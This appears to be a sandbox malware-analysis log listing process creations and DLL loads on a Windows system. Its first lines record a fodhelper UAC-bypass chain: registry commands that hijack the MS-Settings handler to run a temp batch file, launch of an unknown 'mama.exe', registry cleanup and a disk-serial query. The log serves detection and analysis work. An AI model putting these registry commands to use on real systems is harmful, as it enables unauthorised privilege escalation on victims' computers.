Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
Source: C:\Windows\System32\fodhelper.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\mama.exe C:\Users\user\AppData\Roaming\mama.exe
Source: C:\Users\user\AppData\Roaming\mama.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: imgutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: ieframe.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: netapi32.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: version.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: wkscli.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: mlang.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\fodhelper.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
